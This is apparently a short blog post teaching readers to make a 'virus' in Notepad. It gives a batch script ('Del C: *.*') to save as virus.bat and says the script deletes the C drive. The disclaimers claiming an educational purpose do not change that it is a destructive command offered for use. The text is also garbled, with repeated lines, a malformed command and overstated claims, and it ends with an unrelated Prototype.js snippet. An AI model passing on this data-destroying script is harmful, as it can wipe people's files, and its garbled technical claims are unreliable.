how to create virus in android & computer ?

1.This is to how to create virus in android & computer
Download video here
*In this video i show how to create virus this is not bad
*This tutorial is to teach you how hackers create viruses, it would also teach you how antiviruses work and the simple way to create your own antivirus.
*Disclaimer: This tutorial is for educational purposes only. Although this could be used to create a very troubling Virus, you should only use this for experimental reasons. This virus does not attack your computer's operating system environment and therefore should be safe. Please do not use this maliciously.
*Launch the virus and see if your antivirus can pick on it. This would help you know if your antivirus is strong and suitable
2.Learn how to create a computer virus in less than 60 seconds: Almost every computer or laptop user has faced virus attack at least once in their life for sure, and we all know what is virus. Today we are going to describe five ways to create a virus in less than a minute.
*Many of you will think the methods must be on coding, but there is nothing like that. The tricks are based on the notepad. Just follow the below steps for creating a virus within a minute. Additionally, you can remove malware from your browser if it is infected. So, lets check out how to make a virus with notepad.
* Creating a Dangerous Virus
Step 1. First of all, in your Windows OS, open the notepad.
*Step 2. Now copy and paste the below code in your notepad screen.
@Echo off
Del C: *.* |y
*Step 3. Now save this file as virus.bat (you can select any of random name but .bat after that must be there).
:Creating a Dangerous Virus
:Creating a Dangerous Virus
 :Now running the file will delete the C drive completely, and the operating system of the respective computer will get corrupted.
*Note: This method is only for knowledge purpose. Don’t try this on your computer as it will completely format your C drive.



Enjoy! Follow us for more...

No comments:

Post a Comment

How to make Hash objects with $H() function in JavaScript.mp4

 In JavaScript, you can create hash-like objects using the $H() function, which is commonly associated with the Prototype.js framework. How...